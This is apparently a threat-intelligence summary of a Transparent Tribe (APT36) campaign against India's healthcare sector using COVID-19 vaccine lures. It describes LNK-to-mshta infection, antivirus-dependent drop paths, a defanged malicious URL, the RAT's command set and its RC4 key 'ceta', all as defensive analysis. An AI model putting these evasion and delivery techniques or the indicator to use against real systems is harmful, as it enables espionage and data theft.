238.txt

Transparent Tribe Targeted Attack Campaign Against Indian Healthcare Sector Leveraging COVID-19 Vaccine Hotspots  
Transparent Tribe (also known as APT36, ProjectM, C-Major), a South Asian-origin APT group, has long conducted targeted attacks against political and military institutions in neighboring countries/regions. The group developed its proprietary CrimsonRAT malware and was found spreading USB worms extensively. From late 2019, the group focused on Afghanistan before shifting back to Indian targets around January 2020 using job recruitment and military-themed lures. By March 2020, it launched new campaigns against Indian and Afghan targets with electronics/defense/security/resume-related themes. Since the COVID-19 outbreak, Transparent Tribe joined other APT groups in pandemic-themed attacks, deploying malicious documents targeting India in April 2020 alongside intensified USB worm attacks against Afghanistan using previously undisclosed usbworm components. Recent 360 Advanced Threat Research Institute monitoring revealed new Transparent Tribe attacks exploiting COVID-19 vaccine topics to steal intelligence from India's healthcare sector. The campaign used ZIP archives containing PDF-disguised LNK files that execute mshta.exe to load remote HTA scripts from hxxps://londonkids[.]in/echoolz/assets/css/front/hwo/DATE-OF-NEXT-INCREMENT-ON-UP-GRADATION-OF-PAY-ON-01-JAN-AND-01-JUL/css. The HTA script decodes base64-encoded strings to execute malicious code via .NET serialization, invoking the PinkAgain function to drop files while using WMI to detect antivirus products for path selection strategies. A decoy COVID-19 vaccine document hosted on Google Docs displays to victims post-infection. The .NET dropper adapts payload delivery paths based on detected security products: releasing syhostt.hta to startup folders when Avast/Windows Defender are present, MyMusic/startup folders for Kaspersky, and MyMusic/MyApplication for Symantec. Analysis revealed coding errors in Unicode/ASCII conversions preventing proper RAT execution unless faulty string decoding lines are removed. The final RAT (distinct from CrimsonRAT/PeppyRAT) communicates with C2 using RC4 encryption with "ceta" key (potentially referencing Canada-EU CETA trade agreement), featuring commands including downloadexe/download/upload/run/delete/rename/creatdir/list/process/pkill/clipboard/clipboardset/screen/shellexec/close while collecting AV software lists and MAC addresses. Transparent Tribe mimicked SideWinder APT's TTPs in this campaign, replicating malicious script structures and adopting identical PreBotHta module names. Path string similarities were observed between syhostt.hta in current attacks and sihostt.exe from September 2020 incidents. The ongoing India-Pakistan cyber conflict sees APT groups frequently cross-imitate tactics - Transparent Tribe previously copied Donot Team (APT-C-35)'s macro codes and now emulates SideWinder's patterns to complicate attribution. South Asia's volatile geopolitical situation and inadequate cybersecurity awareness enable rampant APT activities. Recent attacks expand beyond traditional military/political targets to COVID-19 vaccine-related healthcare sector exploitation. 360 recommends enhanced security awareness, infrastructure hardening, and increased investment in defensive capabilities. APT groups' increasing use of false flag operations and TTP mimicry poses significant challenges for accurate attribution and technical analysis.